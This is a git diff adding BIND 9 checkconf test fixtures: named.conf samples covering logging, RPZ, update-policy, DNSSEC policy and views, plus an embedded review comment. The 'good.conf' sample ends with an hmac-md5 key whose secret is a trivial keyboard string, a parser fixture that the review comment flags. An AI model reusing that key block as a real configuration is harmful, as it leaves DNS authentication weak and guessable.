+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+logging {
+ channel one {
+ file "one.out";
+ print-time no;
+ };
+ channel two {
+ file "two.out";
+ print-time yes;
+ };
+ channel three {
+ file "three.out";
+ print-time local;
+ };
+ channel four {
+ file "four.out";
+ print-time iso8601;
+ };
+ channel five {
+ file "five.out";
+ print-time iso8601-utc;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-response-dot.conf b/bin/tests/system/checkconf/good-response-dot.conf
new file mode 100644
index 0000000..68bd96e
--- /dev/null
+++ b/bin/tests/system/checkconf/good-response-dot.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com." {
+ type master;
+ file "example.com.zone";
+};
+
+options {
+ response-policy {
+ zone "example.com." policy given;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-rpz-ttl.conf b/bin/tests/system/checkconf/good-rpz-ttl.conf
new file mode 100644
index 0000000..b40a3d5
--- /dev/null
+++ b/bin/tests/system/checkconf/good-rpz-ttl.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com." {
+ type master;
+ file "example.com.zone";
+};
+
+options {
+ response-policy {
+ zone "example.com." policy given;
+ }
+ max-policy-ttl 1h;
+};
diff --git a/bin/tests/system/checkconf/good-rpz-update.conf b/bin/tests/system/checkconf/good-rpz-update.conf
new file mode 100644
index 0000000..2ad6bc1
--- /dev/null
+++ b/bin/tests/system/checkconf/good-rpz-update.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com." {
+ type master;
+ file "example.com.zone";
+};
+
+options {
+ response-policy {
+ zone "example.com."
+ policy given
+ min-update-interval 5m;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-rrset-order-none.conf b/bin/tests/system/checkconf/good-rrset-order-none.conf
new file mode 100644
index 0000000..f0818ca
--- /dev/null
+++ b/bin/tests/system/checkconf/good-rrset-order-none.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rrset-order {
+ order none;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-static-ds.conf b/bin/tests/system/checkconf/good-static-ds.conf
new file mode 100644
index 0000000..be7412a
--- /dev/null
+++ b/bin/tests/system/checkconf/good-static-ds.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. static-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6";
+};
diff --git a/bin/tests/system/checkconf/good-transfer-source-v6.conf b/bin/tests/system/checkconf/good-transfer-source-v6.conf
new file mode 100644
index 0000000..0527b85
--- /dev/null
+++ b/bin/tests/system/checkconf/good-transfer-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ transfer-source-v6 fd92:7065:b8e:ffff::1;
+};
diff --git a/bin/tests/system/checkconf/good-transfer-source.conf b/bin/tests/system/checkconf/good-transfer-source.conf
new file mode 100644
index 0000000..df23d1c
--- /dev/null
+++ b/bin/tests/system/checkconf/good-transfer-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ transfer-source 10.53.0.1;
+};
diff --git a/bin/tests/system/checkconf/good-update-policy1.conf b/bin/tests/system/checkconf/good-update-policy1.conf
new file mode 100644
index 0000000..b696d8d
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy1.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * self * TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy10.conf b/bin/tests/system/checkconf/good-update-policy10.conf
new file mode 100644
index 0000000..7035741
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy10.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * krb5-subdomain . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy11.conf b/bin/tests/system/checkconf/good-update-policy11.conf
new file mode 100644
index 0000000..8d1027f
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy11.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * tcp-self . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy12.conf b/bin/tests/system/checkconf/good-update-policy12.conf
new file mode 100644
index 0000000..10f1f3f
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy12.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * 6to4-self . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy2.conf b/bin/tests/system/checkconf/good-update-policy2.conf
new file mode 100644
index 0000000..06a35ab
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy2.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * self . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy3.conf b/bin/tests/system/checkconf/good-update-policy3.conf
new file mode 100644
index 0000000..1468a71
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy3.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfsub . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy4.conf b/bin/tests/system/checkconf/good-update-policy4.conf
new file mode 100644
index 0000000..6296bb2
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy4.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfsub * TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy5.conf b/bin/tests/system/checkconf/good-update-policy5.conf
new file mode 100644
index 0000000..2c900bb
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy5.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfwild * TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy6.conf b/bin/tests/system/checkconf/good-update-policy6.conf
new file mode 100644
index 0000000..e615812
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy6.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfwild . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy7.conf b/bin/tests/system/checkconf/good-update-policy7.conf
new file mode 100644
index 0000000..5beb004
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy7.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * krb5-self . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy8.conf b/bin/tests/system/checkconf/good-update-policy8.conf
new file mode 100644
index 0000000..496bc90
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy8.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * ms-self . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-update-policy9.conf b/bin/tests/system/checkconf/good-update-policy9.conf
new file mode 100644
index 0000000..691287a
--- /dev/null
+++ b/bin/tests/system/checkconf/good-update-policy9.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * ms-subdomain . TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/good-view-also-notify.conf b/bin/tests/system/checkconf/good-view-also-notify.conf
new file mode 100644
index 0000000..2efb9b0
--- /dev/null
+++ b/bin/tests/system/checkconf/good-view-also-notify.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view example {
+ also-notify { missing; };
+ zone "example.net" {
+ type slave;
+ notify no;
+ masters { 192.168.1.1; };
+ };
+};
diff --git a/bin/tests/system/checkconf/good.conf b/bin/tests/system/checkconf/good.conf
new file mode 100644
index 0000000..0ecdb68
--- /dev/null
+++ b/bin/tests/system/checkconf/good.conf
@@ -0,0 +1,289 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This is just a random selection of configuration options. + */ + +/* cut here */ +dnssec-policy "test" { + dnskey-ttl 3600; + keys { + ksk key-directory lifetime P1Y algorithm 13 256; + zsk key-directory lifetime P30D algorithm 13; + csk key-directory lifetime P30D algorithm 8 2048; + }; + max-zone-ttl 86400; + nsec3param ; + parent-ds-ttl 7200; + parent-propagation-delay PT1H; + publish-safety PT3600S; + purge-keys P90D; + retire-safety PT3600S; + signatures-refresh P3D; + signatures-validity P2W; + signatures-validity-dnskey P14D; + zone-propagation-delay PT5M; +}; +options { + avoid-v4-udp-ports { + 100; + }; + avoid-v6-udp-ports { + 100; + }; + blackhole { + 10.0.0.0/8; + }; + coresize 1073741824; + datasize 104857600; + directory "."; + dscp 41; + dump-file "named_dumpdb"; + files 1000; + heartbeat-interval 30; + hostname none; + interface-interval 30; + keep-response-order { + 10.0.10.0/24; + }; + listen-on port 90 { + "any"; + }; + listen-on port 100 dscp 33 { + 127.0.0.1/32; + }; + listen-on-v6 port 53 dscp 57 { + "none"; + }; + match-mapped-addresses yes; + memstatistics-file "named.memstats"; + pid-file none; + port 5300; + querylog yes; + recursing-file "named.recursing"; + recursive-clients 3000; + serial-query-rate 100; + server-id none; + update-quota 200; + check-names primary warn; + check-names secondary ignore; + max-cache-size 20000000000000; + nta-lifetime 604800; + nta-recheck 604800; + validate-except { + "corp"; + }; + dnssec-policy "test"; + max-ixfr-ratio 90%; + transfer-source 
0.0.0.0 dscp 63; + zone-statistics none; +}; +parental-agents "parents" { + 10.10.10.11; + 10.10.10.12; +}; +view "first" { + match-clients { + "none"; + }; + zone "example1" { + type master; + file "xxx"; + update-policy local; + max-ixfr-ratio 20%; + notify-source 10.10.10.10 port 53 dscp 55; + }; + zone "clone" { + type master; + file "yyy"; + inline-signing yes; + max-ixfr-ratio unlimited; + }; + dnssec-validation auto; + zone-statistics terse; +}; +view "second" { + match-clients { + "any"; + }; + zone "example1" { + type master; + file "zzz"; + update-policy local; + zone-statistics yes; + }; + zone "example2" { + type static-stub; + forward only; + forwarders { + 10.53.0.4; + }; + zone-statistics no; + }; + zone "example3" { + type static-stub; + server-addresses { + 1.2.3.4; + }; + }; + zone "clone" { + in-view "first"; + }; + zone "." { + type redirect; + masters { + 1.2.3.4; + }; + }; + dnssec-validation auto; + zone-statistics full; +}; +view "third" { + match-clients { + "none"; + }; + zone "clone" { + in-view "first"; + forward only; + forwarders { + 10.0.0.100; + }; + }; + zone "dnssec" { + type master; + file "file"; + allow-update { + "any"; + }; + dnssec-policy "default"; + }; + zone "p" { + type primary; + file "pfile"; + inline-signing yes; + }; + zone "s" { + type secondary; + file "sfile"; + inline-signing yes; + masters { + 1.2.3.4; + }; + notify primary-only; + }; +}; +view "fourth" { + zone "dnssec-test" { + type master; + file "dnssec-test.db"; + inline-signing yes; + parental-agents { + 1.2.3.4; + 1.2.3.5; + }; + dnssec-policy "test"; + parental-source 10.10.10.10 port 53 dscp 55; + }; + zone "dnssec-default" { + type master; + file "dnssec-default.db"; + inline-signing yes; + parental-agents { + "parents"; + }; + dnssec-policy "default"; + }; + zone "dnssec-inherit" { + type master; + file "dnssec-inherit.db"; + inline-signing yes; + }; + zone "dnssec-none" { + type master; + file "dnssec-none.db"; + dnssec-policy "none"; + }; + zone 
"dnssec-view1" { + type master; + file "dnssec-view41.db"; + inline-signing yes; + dnssec-policy "test"; + }; + zone "dnssec-view2" { + type master; + file "dnssec-view42.db"; + inline-signing yes; + }; + zone "dnssec-view3" { + type master; + file "dnssec-view43.db"; + dnssec-policy "none"; + key-directory "keys"; + }; + zone "dnssec-view4" { + type master; + file "dnssec-view44.db"; + dnssec-policy "none"; + }; + dnssec-policy "default"; + key-directory "."; +}; +view "fifth" { + zone "dnssec-view1" { + type master; + file "dnssec-view51.db"; + inline-signing yes; + dnssec-policy "test"; + }; + zone "dnssec-view2" { + type master; + file "dnssec-view52.db"; + inline-signing yes; + dnssec-policy "test"; + key-directory "keys"; + }; + zone "dnssec-view3" { + type master; + file "dnssec-view53.db"; + inline-signing yes; + dnssec-policy "default"; + key-directory "keys"; + }; + zone "dnssec-view4" { + type master; + file "dnssec-view54.db"; + dnssec-policy "none"; + }; + key-directory "."; +}; +view "chaos" chaos { + zone "hostname.bind" chaos { + type master; + database "_builtin hostname"; + inline-signing yes; + }; +}; +dyndb "name" "library.so" { + this; + \}; + is a { + "test" { \{ of; the; }; + } bracketed; + "text \""; + system; +}; +key "mykey" { + algorithm "hmac-md5"; + secret "qwertyuiopasdfgh"; +}; diff --git a/bin/tests/system/checkconf/good.zonelist b/bin/tests/system/checkconf/good.zonelist new file mode 100644 index 0000000..08a5665 --- /dev/null +++ b/bin/tests/system/checkconf/good.zonelist 
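Review bot: The `key "mykey"` block at the end of good.conf uses `algorithm "hmac-md5"` with the keyboard-row secret `"qwertyuiopasdfgh"`, and nothing in the file marks it as a dummy. Files named good*.conf read as known-good samples, so a line in the header comment above `/* cut here */`, for example `* The key at the end is a parser fixture, not a usable credential.`, would keep it from being copied as one. If the test does not depend on MD5 specifically, `algorithm "hmac-sha256";` is a better choice for a sample that is expected to be accepted. The text after `/* cut here */` looks like canonical printed output and may be compared verbatim, so the comment should not be placed next to the key itself.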
@@ -0,0 +1,24 @@
+example1 IN first master
+clone IN first master
+example1 IN second master
+example2 IN second static-stub
+example3 IN second static-stub
+clone IN second in-view first
+. IN second redirect
+clone IN third in-view first
+dnssec IN third master
+p IN third primary
+s IN third secondary
+dnssec-test IN fourth master
+dnssec-default IN fourth master
+dnssec-inherit IN fourth master
+dnssec-none IN fourth master
+dnssec-view1 IN fourth master
+dnssec-view2 IN fourth master
+dnssec-view3 IN fourth master
+dnssec-view4 IN fourth master
+dnssec-view1 IN fifth master
+dnssec-view2 IN fifth master
+dnssec-view3 IN fifth master
+dnssec-view4 IN fifth master
+hostname.bind chaos chaos master
diff --git a/bin/tests/system/checkconf/hint-nofile.conf b/bin/tests/system/checkconf/hint-nofile.conf
new file mode 100644
index 0000000..1d1dee2
--- /dev/null
+++ b/bin/tests/system/checkconf/hint-nofile.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "nonexistent.db";
+};
diff --git a/bin/tests/system/checkconf/in-view-good.conf b/bin/tests/system/checkconf/in-view-good.conf
new file mode 100644
index 0000000..afda587
--- /dev/null
+++ b/bin/tests/system/checkconf/in-view-good.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view internal {
+ zone shared.example {
+ type master;
+ file "shared.example.db";
+ };
+};
+
+view external {
+ zone shared.example {
+ in-view internal;
+ };
+};
diff --git a/bin/tests/system/checkconf/inline-bad.conf b/bin/tests/system/checkconf/inline-bad.conf
new file mode 100644
index 0000000..2eb23a5
--- /dev/null
+++ b/bin/tests/system/checkconf/inline-bad.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl "transferees" {};
+masters "stealthMasters" {127.0.0.1;};
+masters "publicSlaves" {127.0.0.1;};
+zone "example.net" {
+ type slave;
+ key-directory "/var/lib/bind/example.net";
+ auto-dnssec maintain;
+ inline-signing yes;
+ masters { stealthMasters; };
+ notify explicit;
+ also-notify { publicSlaves; };
+ allow-transfer { localhost; transferees; };
+};
+
diff --git a/bin/tests/system/checkconf/inline-good.conf b/bin/tests/system/checkconf/inline-good.conf
new file mode 100644
index 0000000..60c3b1e
--- /dev/null
+++ b/bin/tests/system/checkconf/inline-good.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl "transferees" {};
+masters "stealthMasters" {127.0.0.1;};
+masters "publicSlaves" {127.0.0.1;};
+zone "example.net" {
+ type slave;
+ file "/var/cache/bind/example.net.db";
+ key-directory "/var/lib/bind/example.net";
+ auto-dnssec maintain;
+ inline-signing yes;
+ masters { stealthMasters; };
+ notify explicit;
+ also-notify { publicSlaves; };
+ allow-transfer { localhost; transferees; };
+};
+
diff --git a/bin/tests/system/checkconf/inline-no.conf b/bin/tests/system/checkconf/inline-no.conf
new file mode 100644
index 0000000..64657f9
--- /dev/null
+++ b/bin/tests/system/checkconf/inline-no.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl "transferees" {};
+masters "stealthMasters" {127.0.0.1;};
+masters "publicSlaves" {127.0.0.1;};
+zone "example.net" {
+ type slave;
+ key-directory "/var/lib/bind/example.net";
+ auto-dnssec maintain;
+ inline-signing no;
+ masters { stealthMasters; };
+ notify explicit;
+ also-notify { publicSlaves; };
+ allow-transfer { localhost; transferees; };
+};
+
diff --git a/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf b/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf
new file mode 100644
index 0000000..6e86d90
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "good-kasp.conf";
+
+zone "nsec3.net" {
+ type master;
+ file "nsec3.db";
+ dnssec-policy "test";
+ auto-dnssec maintain;
+ dnskey-sig-validity 3600;
+ dnssec-dnskey-kskonly yes;
+ dnssec-secure-to-insecure yes;
+ dnssec-update-mode maintain;
+ inline-signing no;
+ sig-validity-interval 3600;
+ update-check-ksk yes;
+};
diff --git a/bin/tests/system/checkconf/kasp-bad-keylen.conf b/bin/tests/system/checkconf/kasp-bad-keylen.conf
new file mode 100644
index 0000000..7e3465f
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-bad-keylen.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "bad-keylen" {
+ keys {
+ csk lifetime P10Y algorithm rsasha1 511;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "bad-keylen";
+};
diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf
new file mode 100644
index 0000000..474c1d8
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
